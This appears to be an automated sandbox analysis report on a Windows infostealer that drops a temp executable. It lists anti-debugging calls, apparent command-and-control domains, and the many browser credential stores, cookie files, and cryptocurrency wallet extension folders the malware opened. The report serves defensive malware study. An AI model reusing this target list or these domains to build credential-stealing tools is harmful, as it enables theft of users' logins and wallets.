        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00589D23 push dword ptr fs:[00000030h]0_2_00589D23
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021500B6 mov eax, dword ptr fs:[00000030h]0_2_021500B6
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0212092B mov eax, dword ptr fs:[00000030h]0_2_0212092B
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02120D90 mov eax, dword ptr fs:[00000030h]0_2_02120D90
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00560083 push dword ptr fs:[00000030h]1_2_00560083
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F092B mov eax, dword ptr fs:[00000030h]1_2_020F092B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F0D90 mov eax, dword ptr fs:[00000030h]1_2_020F0D90
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0214A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0214A62A
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0213072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0213072A
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0212FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0212FB6E
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021308BD SetUnhandledExceptionFilter,0_2_021308BD

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 67E6.tmp.exeString found in binary or memory: robinsharez.shop
        Source: 67E6.tmp.exeString found in binary or memory: handscreamny.shop
        Source: 67E6.tmp.exeString found in binary or memory: chipdonkeruz.shop
        Source: 67E6.tmp.exeString found in binary or memory: versersleep.shop
        Source: 67E6.tmp.exeString found in binary or memory: crowdwarek.shop
        Source: 67E6.tmp.exeString found in binary or memory: apporholis.shop
        Source: 67E6.tmp.exeString found in binary or memory: femalsabler.shop
        Source: 67E6.tmp.exeString found in binary or memory: soundtappysk.shop
        Source: 67E6.tmp.exeString found in binary or memory: skidjazzyric.click
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeProcess created: C:\Users\user\AppData\Local\Temp\67E6.tmp.exe "C:\Users\user\AppData\Local\Temp\67E6.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_004351B0
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0043B272
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0043B358
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_0043B635
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_0043B865
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_00434DBD
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0215B261
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_02155024
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_02155417
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0215B4D9
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0215B524
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: EnumSystemLocalesW,0_2_0215B5BF
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_0215BACC
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0215BB99
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,0_2_0215B89C
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0215B9C5
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 67E6.tmp.exe PID: 7076, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.00000000007DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: (>}llets/Electrum-LTC
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: 67E6.tmp.exeString found in binary or memory: ExodusWeb3
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
